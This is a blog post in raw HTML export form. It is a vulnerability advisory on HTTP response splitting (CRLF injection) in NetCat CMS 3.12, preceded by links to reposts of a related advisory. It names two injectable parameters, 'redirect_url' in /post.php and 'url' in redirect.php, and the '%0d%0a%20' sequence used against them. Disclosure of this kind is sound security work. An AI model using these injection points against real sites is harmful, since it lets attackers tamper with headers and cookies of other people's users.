<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://progressive-comp.com/?l=full-disclosure&m=142907520526783&w=1"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://progressive-comp.com/?l=full-disclosure&m=142907520526783&w=1</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://tetraph.com/security/html-injection/netcat-cms-3-12-html-injection/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.com/security/html-injection/netcat-cms-3-12-html-injection/</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://whitehatpost.blog.163.com/blog/static/242232054201551434123334/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://whitehatpost.blog.163.com/blog/static/242232054201551434123334/</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://russiapost.blogspot.ru/2015/06/netcat-html-injection.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://russiapost.blogspot.ru/2015/06/netcat-html-injection.html</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://inzeed.wordpress.com/2015/04/21/netcat-html-injection/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://inzeed.wordpress.com/2015/04/21/netcat-html-injection/</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://computerobsess.blogspot.com/2015/06/osvdb-120807-netcat-cms-312-html.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://computerobsess.blogspot.com/2015/06/osvdb-120807.html</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://blog.163.com/greensun_2006/blog/static/11122112201551434045926/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://blog.163.com/greensun_2006/blog/static/11122112201551434045926/</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://www.inzeed.com/kaleidoscope/computer-web-security/netcat-cms-3-12-html-injection/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.inzeed.com/kaleidoscope/computer-web-security/netcat-cms-3-12-html/</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://germancast.blogspot.de/2015/06/netcat-html-injection.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://germancast.blogspot.de/2015/06/netcat-html-injection.html</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/netcat-cms-3-12-html-injection/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://diebiyi.com/articles/security/netcat-cms-3-12-html-injection/</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-3393657335057161732015-06-14T00:09:00.000-07:002015-06-14T00:09:31.545-07:00OSVDB 119342, 119323 NetCat CMS Multiple HTTP Response Splitting (CRLF) Web Security Vulnerabilities<div class="separator" style="-webkit-text-stroke-width: 0px; clear: both; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: center; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizfK2-lz21RsIr9Y4m7zXCQuZAb0SOcv30ocyigIgU_gwfsC9RpH3x3ym7RJx5rkut3UQERkYdzYnCciA-RjRNn4JgG573UwxyCo0qLTp2_wvYo5lUGMB4RfTRrlrOHChVnsHGpv8B_puV/s1600/netcat_2.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizfK2-lz21RsIr9Y4m7zXCQuZAb0SOcv30ocyigIgU_gwfsC9RpH3x3ym7RJx5rkut3UQERkYdzYnCciA-RjRNn4JgG573UwxyCo0qLTp2_wvYo5lUGMB4RfTRrlrOHChVnsHGpv8B_puV/s400/netcat_2.png" style="cursor: move;" width="400" /></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b>OSVDB 119342, 119323 </b></span><b><span style="font-family: Arial, Helvetica, sans-serif;">NetCat CMS Multiple HTTP Response Splitting (CRLF) Web Security Vulnerabilities</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">Exploit Title: NetCat CMS Multiple CRLF Security Vulnerabilities</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Product: NetCat CMS (Content Management System)</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Vendor: NetCat</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable Versions: 5.01 3.12 3.0 2.4 2.3 2.2 2.1 2.0 1.1</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Tested Version: 3.12</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Advisory Publication: March 07, 2015</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Latest Update: March 07, 2015</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Type: Improper Neutralization of CRLF Sequences ('CRLF Injection') [CWE-93]</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">CVE Reference: *</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">OSVDB Reference: 119342, 119343</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Impact CVSS Severity (version 2.0):</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Impact Subscore: 2.9</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Exploitability Subscore: 8.6</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">CVSS Version 2 Metrics:</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Access Vector: Network exploitable; Victim must voluntarily interact with attack mechanism</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Access Complexity: Medium</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Authentication: Not required to exploit</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Impact Type: Allows unauthorized modification</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Discover and Author: <span style="background-color: white;">Jing Wang, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (<a href="https://twitter.com/justqdjing/status/574207452729622528">@justqdjing</a>)</span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">Advisory Details:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>(1) Vendor & Product Description:</b></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>Vendor:</b></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">Product & Version:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">5.01 3.12 3.0 2.4 2.3 2.2 2.1 2.0 1.1</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">Vendor URL & Download:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat can be got from here,</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://netcat.ru/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://netcat.ru/</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">Product Introduction:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat.ru is russian local company. "NetCat designed to create an absolute majority of the types of sites: from simple "business card" with a minimum content to complex web-based systems, from corporate offices to online stores, libraries or media data - in other words, projects completely different directions and at any level of complexity. View examples of sites running on NetCat CMS can be in a special section."</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">"Manage the site on the basis of NetCat can even inexperienced user, because it does not require knowledge of Internet technologies, programming and markup languages. NetCat constantly improving, adds new features. In the process of finalizing necessarily take into account the wishes of our partners and clients, as well as trends in Internet development. More than 2,000 studios and private web developers have chosen for their projects is NetCat, and in 2013 sites, successfully working on our CMS, created more than 18,000."</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">(2) Vulnerability Details:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat web application has a computer security bug problem. It can be exploited by HTTP Response Splitting (CRLF) attacks. This could allow a remote attacker to insert arbitrary HTTP headers, which are included in a response sent to the server. If an application does not properly filter such a request, it could be used to inject additional headers that manipulate cookies, authentication status, or more.</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Several other similar products 0-day vulnerabilities have been found by some other bug hunter researchers before. NetCat has patched some of them. CXSECurity is a huge collection of information on data communications safety. Its main objective is to inform about errors in various applications. It also publishes suggestions, advisories, solutions details related to CRLF vulnerabilities and cyber intelligence recommendations.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.1) </b>The first code flaw occurs at "/post.php" page with "redirect_url" parameter by adding "%0d%0a%20".</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.2)</b> The second code flaw occurs at "redirect.php?" page with "url" parameter by adding "%0d%0a%20".</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><b>References:</b><br /><a href="http://www.osvdb.org/show/osvdb/119342">http://www.osvdb.org/show/osvdb/119342</a></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://www.osvdb.org/show/osvdb/119343"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.osvdb.org/show/osvdb/119343</span></a></div>
